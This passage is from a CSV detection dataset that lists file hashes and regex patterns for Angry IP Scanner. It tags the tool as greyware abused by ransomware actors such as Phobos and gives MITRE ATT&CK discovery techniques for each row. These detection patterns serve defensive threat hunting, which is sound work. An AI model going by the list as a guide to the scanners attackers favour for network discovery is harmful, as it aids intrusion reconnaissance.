TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*974b582afcd5cb78733171a0b1a532b3d06203f5f2731acfe3958e68716c0b3c*",".{0,1000}974b582afcd5cb78733171a0b1a532b3d06203f5f2731acfe3958e68716c0b3c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9919f925721fc891959663daa9b9f472f75d97396bf60c1baf9ee3c10a89f73b*",".{0,1000}9919f925721fc891959663daa9b9f472f75d97396bf60c1baf9ee3c10a89f73b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*99833f7e6a8120d3f1df7098d8314d6469439a6dca2841ddeffe570e1f14bed2*",".{0,1000}99833f7e6a8120d3f1df7098d8314d6469439a6dca2841ddeffe570e1f14bed2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9a2a18d4f18f7a64c52cfe036a86f5bb2f7f7770d70031a8773df3856895a082*",".{0,1000}9a2a18d4f18f7a64c52cfe036a86f5bb2f7f7770d70031a8773df3856895a082.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9a560a6c7ad81192188dad3e3eb2cd752f552739876009f15e8aa31f8be45f39*",".{0,1000}9a560a6c7ad81192188dad3e3eb2cd752f552739876009f15e8aa31f8be45f39.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9aa60c69492c8b3ef312ec4410e0574eb054cf7ca9785f7c4d89d83277143785*",".{0,1000}9aa60c69492c8b3ef312ec4410e0574eb054cf7ca9785f7c4d89d83277143785.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9b473206df119def590d2f515c19cb3db7084c1d3a2ec1199313f551bd6013ec*",".{0,1000}9b473206df119def590d2f515c19cb3db7084c1d3a2ec1199313f551bd6013ec.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9d0597a638eabb7fff63dc41d6449d47fce11f4491a703d0447e78d53387fe38*",".{0,1000}9d0597a638eabb7fff63dc41d6449d47fce11f4491a703d0447e78d53387fe38.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9d0edb290dc290f8cb748123558db11a3477269f810618a86ff8e81f30830e08*",".{0,1000}9d0edb290dc290f8cb748123558db11a3477269f810618a86ff8e81f30830e08.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9d1fb01df8a856d1bc633277add91aedeec15f773192a8733de3ed747784c916*",".{0,1000}9d1fb01df8a856d1bc633277add91aedeec15f773192a8733de3ed747784c916.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9e68d5982934294b5ef4bd570efd96b170d6a2aec1507cb4f248911da72380be*",".{0,1000}9e68d5982934294b5ef4bd570efd96b170d6a2aec1507cb4f248911da72380be.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9eb625cc9e117d567ed568453ab0e5d9d1c9af2584338fb78640a1fb03dcd1c1*",".{0,1000}9eb625cc9e117d567ed568453ab0e5d9d1c9af2584338fb78640a1fb03dcd1c1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9f29ce88a53096c66bdd2dcb1b1e04b305358bef7aaa681a5fa8cd8ef406e63b*",".{0,1000}9f29ce88a53096c66bdd2dcb1b1e04b305358bef7aaa681a5fa8cd8ef406e63b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*9fb81c3c3003985257be77b5ff0e531de79ecc35fc84c98a92a59e8ca88e25f1*",".{0,1000}9fb81c3c3003985257be77b5ff0e531de79ecc35fc84c98a92a59e8ca88e25f1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a040131b51b4e124e4ac5a2cfa2e66adf3f7f279f98c86359870285bff228f42*",".{0,1000}a040131b51b4e124e4ac5a2cfa2e66adf3f7f279f98c86359870285bff228f42.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a2031a3ae2df3902ff26bfeff68f5c04a852e0d815b8e8dcbb2085f08b23656f*",".{0,1000}a2031a3ae2df3902ff26bfeff68f5c04a852e0d815b8e8dcbb2085f08b23656f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a26411f870a108af946d0b0298a2af36b88a3de21af299e71211e6da101f8e41*",".{0,1000}a26411f870a108af946d0b0298a2af36b88a3de21af299e71211e6da101f8e41.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a2749791478d33e10f88bba9c8191f42614e8606189f3a01a1406a2b47227a79*",".{0,1000}a2749791478d33e10f88bba9c8191f42614e8606189f3a01a1406a2b47227a79.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a4c9bcf5a748e432e6ae84393c4d174d7f1b7cc6a3e7308183ac829970b73e6e*",".{0,1000}a4c9bcf5a748e432e6ae84393c4d174d7f1b7cc6a3e7308183ac829970b73e6e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a66fa8f23507c11444e52e58ea00e3b38e972a5d95fdb51a824967fd8183460a*",".{0,1000}a66fa8f23507c11444e52e58ea00e3b38e972a5d95fdb51a824967fd8183460a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a6d7077ea6b3c4aeb393c266652682661f77e334b1809372eb260f9d24d2e648*",".{0,1000}a6d7077ea6b3c4aeb393c266652682661f77e334b1809372eb260f9d24d2e648.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a70208a1f564cce41472dc8e87cd9e4d9bff7feb6ca03407282ffdd935967ba3*",".{0,1000}a70208a1f564cce41472dc8e87cd9e4d9bff7feb6ca03407282ffdd935967ba3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a74c5c5699517281aa37e2b00acb36a32b33d7d7c686a41c8d6fc2a1594d3611*",".{0,1000}a74c5c5699517281aa37e2b00acb36a32b33d7d7c686a41c8d6fc2a1594d3611.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a75a10d43c1ec77f2e59232d6c4f66662d7d3c9d28195d3b4aa9e201d0d28ae6*",".{0,1000}a75a10d43c1ec77f2e59232d6c4f66662d7d3c9d28195d3b4aa9e201d0d28ae6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a79bc1f4c36a377d1beb707300e47c0ba6c3bea953f77f6e2a0435a5a23f1cd3*",".{0,1000}a79bc1f4c36a377d1beb707300e47c0ba6c3bea953f77f6e2a0435a5a23f1cd3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a7c7396da9d14ba531ea5c09d8920ad52eb2300b2d48ed368413cb77c5035ce4*",".{0,1000}a7c7396da9d14ba531ea5c09d8920ad52eb2300b2d48ed368413cb77c5035ce4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a95f17316afad267ca57989a4480fc157aa50618868cb19defe14e45cda7e23b*",".{0,1000}a95f17316afad267ca57989a4480fc157aa50618868cb19defe14e45cda7e23b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a9aae83a121f855ea420850fe6bb8b01e80e3dcbafcb50d819cb2f71de8fbeb7*",".{0,1000}a9aae83a121f855ea420850fe6bb8b01e80e3dcbafcb50d819cb2f71de8fbeb7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*a9cb54d1e2377be31945692f6206a98056419b6ca641a3e79eada2a259e22226*",".{0,1000}a9cb54d1e2377be31945692f6206a98056419b6ca641a3e79eada2a259e22226.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*aa67b66d9c4124b52e572988493b78cda3ff438dc27988ff30338c3f6d38e34b*",".{0,1000}aa67b66d9c4124b52e572988493b78cda3ff438dc27988ff30338c3f6d38e34b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*aa9ef9b244e7b5d88f24211586a2e10d553a7c80f9a6d17a3d5d783d115b2f47*",".{0,1000}aa9ef9b244e7b5d88f24211586a2e10d553a7c80f9a6d17a3d5d783d115b2f47.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ab4b3257fd667f9daf4cfbe54992b99c378a1a2e6922fe5d955cdaca6da99f3b*",".{0,1000}ab4b3257fd667f9daf4cfbe54992b99c378a1a2e6922fe5d955cdaca6da99f3b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ab8428de3f3f1eb1fb54c974d71296373466ccb7c9bedef96329d6fbfcc23947*",".{0,1000}ab8428de3f3f1eb1fb54c974d71296373466ccb7c9bedef96329d6fbfcc23947.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ac1e2d8de30ae0048cfe3ae27fbddcf3e16e38dcb33d9b83c16f32831c865219*",".{0,1000}ac1e2d8de30ae0048cfe3ae27fbddcf3e16e38dcb33d9b83c16f32831c865219.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*acd40244ed0a4264f5bafafbf9ca8e4b3813b27013bce2c550cd9f5e8093c8b8*",".{0,1000}acd40244ed0a4264f5bafafbf9ca8e4b3813b27013bce2c550cd9f5e8093c8b8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ad2ce18715d8811efe3071d94d6cac4b1f0a60dd4e6b95c0bb43e9b9f3dc2921*",".{0,1000}ad2ce18715d8811efe3071d94d6cac4b1f0a60dd4e6b95c0bb43e9b9f3dc2921.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - 
TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*ae50c71517182c9773bb138745f10a643b1215078ede439b2b3adb486a9cfb14*",".{0,1000}ae50c71517182c9773bb138745f10a643b1215078ede439b2b3adb486a9cfb14.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*angryip/ipscan*",".{0,1000}angryip\/ipscan.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","1","N/A","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b087a02bc2325dcbb06caa40e7debe301dea47b89f1e4a875092835e056f0b73*",".{0,1000}b087a02bc2325dcbb06caa40e7debe301dea47b89f1e4a875092835e056f0b73.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b0a1898b536d811f388b3fddd94d50c8bcec6e87f11a7c36e5d4e5761563eb4f*",".{0,1000}b0a1898b536d811f388b3fddd94d50c8bcec6e87f11a7c36e5d4e5761563eb4f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*b190ff95d6d155e9a49752a555ca8ba14fe9e40156ec8cc5f8bcb6b0674cb80e*",".{0,1000}b190ff95d6d155e9a49752a555ca8ba14fe9e40156ec8cc5f8bcb6b0674cb80e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b31e9e186194897b6b75e122c5ea4bf20170a485ff31faf312612514fe7b92ec*",".{0,1000}b31e9e186194897b6b75e122c5ea4bf20170a485ff31faf312612514fe7b92ec.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b3b8e7d50a413a441df3ee1d510d3a9f537f9bc3a8da6119814da8da34940e64*",".{0,1000}b3b8e7d50a413a441df3ee1d510d3a9f537f9bc3a8da6119814da8da34940e64.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b3f9f99ab501e8c40099dc351b2a59281e6a6b8117deae1e0d820ea70dd6a041*",".{0,1000}b3f9f99ab501e8c40099dc351b2a59281e6a6b8117deae1e0d820ea70dd6a041.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*b411cbafc30aeeb59c69803b5f962f87a653fdf4a4a6f4292ecb6280978c0cc2*",".{0,1000}b411cbafc30aeeb59c69803b5f962f87a653fdf4a4a6f4292ecb6280978c0cc2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b624a1f6b4582374715c11809ec8cfc7f8d6b15ee426b0027357377eb5e250a3*",".{0,1000}b624a1f6b4582374715c11809ec8cfc7f8d6b15ee426b0027357377eb5e250a3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b7c1564546c8c57f4c1581d8473ae7a88ecba2e2a114178f8862ed8a15c93e16*",".{0,1000}b7c1564546c8c57f4c1581d8473ae7a88ecba2e2a114178f8862ed8a15c93e16.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b855b843211e9604d22362e14906b73b7016f230b11aab67047ac8b4e071da18*",".{0,1000}b855b843211e9604d22362e14906b73b7016f230b11aab67047ac8b4e071da18.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*b8b12628c324cddb1e1a464c1caf2597b66ce8f5f1057ffa86c1fe7b1c241b40*",".{0,1000}b8b12628c324cddb1e1a464c1caf2597b66ce8f5f1057ffa86c1fe7b1c241b40.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b9593e94892849b50e819c070843639953a69917a9069cb603433b3261519be7*",".{0,1000}b9593e94892849b50e819c070843639953a69917a9069cb603433b3261519be7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b9723ac6913ec711c25f35ae45869af57f3868b690a8da331ccbedfcd37ca68f*",".{0,1000}b9723ac6913ec711c25f35ae45869af57f3868b690a8da331ccbedfcd37ca68f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*b9e13383878ef7999d46b18b41d6699ce5c406af071ec849235bdd103025e3e5*",".{0,1000}b9e13383878ef7999d46b18b41d6699ce5c406af071ec849235bdd103025e3e5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
"*ba8bf4dcb9e12c6a4abc64205fe7e07ddf0610db4a6c536a550125d597add25b*",".{0,1000}ba8bf4dcb9e12c6a4abc64205fe7e07ddf0610db4a6c536a550125d597add25b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*bb1ce1e7d92f6ac0da1bd1b8cee56d6139b9dc41f5821e58e7d07063805e7b3f*",".{0,1000}bb1ce1e7d92f6ac0da1bd1b8cee56d6139b9dc41f5821e58e7d07063805e7b3f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*bc75191718b8556c1c8610987285d98f7421044d7be117252d5f35516af3205c*",".{0,1000}bc75191718b8556c1c8610987285d98f7421044d7be117252d5f35516af3205c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" "*bc7ee01c3d261a0c0a63e250513aa2eb28d7f707570c8fb507742fb125c5da07*",".{0,1000}bc7ee01c3d261a0c0a63e250513aa2eb28d7f707570c8fb507742fb125c5da07.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z" 
